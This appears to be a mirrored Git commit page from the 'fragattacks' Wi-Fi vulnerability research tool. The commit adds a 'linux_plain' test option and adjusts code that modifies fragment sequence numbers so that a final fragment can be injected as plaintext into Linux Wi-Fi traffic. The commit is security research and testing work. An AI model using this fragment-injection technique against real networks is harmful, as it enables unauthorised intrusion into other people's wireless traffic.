Amazing-Mirror/fragattacks
1
0
Fork 0
mirror of https://github.com/vanhoefm/fragattacks.git synced 2025-02-07 12:44:03 -05:00
Code Issues Projects Releases Wiki Activity

fragattacks: option to execute Linux plaintext append attack

Browse Source
This commit is contained in:
Mathy 2020-04-23 12:06:04 -04:00 committed by Mathy Vanhoef
parent 459fa3c33f
commit 0275ac30d9
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
research/fragattack.py
View File

@ -300,16 +300,15 @@ class LinuxTest(Test):
# Fragment 1: normal # Fragment 1: normal
self.actions[0].frame = frag1 self.actions[0].frame = frag1
# Fragment 2: make Linux update latest used crypto Packet Number # Fragment 2: make Linux update latest used crypto Packet Number.
# We only change the sequence number since that is not authenticated.
frag2enc = frag2.copy() frag2enc = frag2.copy()
frag2enc.SC ^= (1 << 4) | 1 frag2enc.SC ^= (1 << 4)
self.actions[1].frame = frag2enc self.actions[1].frame = frag2enc
# Fragment 3: can now inject last fragment as plaintext # Fragment 3: can now inject last fragment as plaintext
self.actions[2].frame = frag2 self.actions[2].frame = frag2
return test
class MacOsTest(Test): class MacOsTest(Test):
""" """
See docs/macoxs-reversing.md for background on the attack. See docs/macoxs-reversing.md for background on the attack.
@ -1216,6 +1215,9 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=False):
test = EapolMsduTest(REQ_ICMP, actions) test = EapolMsduTest(REQ_ICMP, actions)
elif test_name == "linux_plain":
test = LinuxTest(REQ_ICMP)
elif test_name == "macos": elif test_name == "macos":
test = MacOsTest(REQ_DHCP) test = MacOsTest(REQ_DHCP)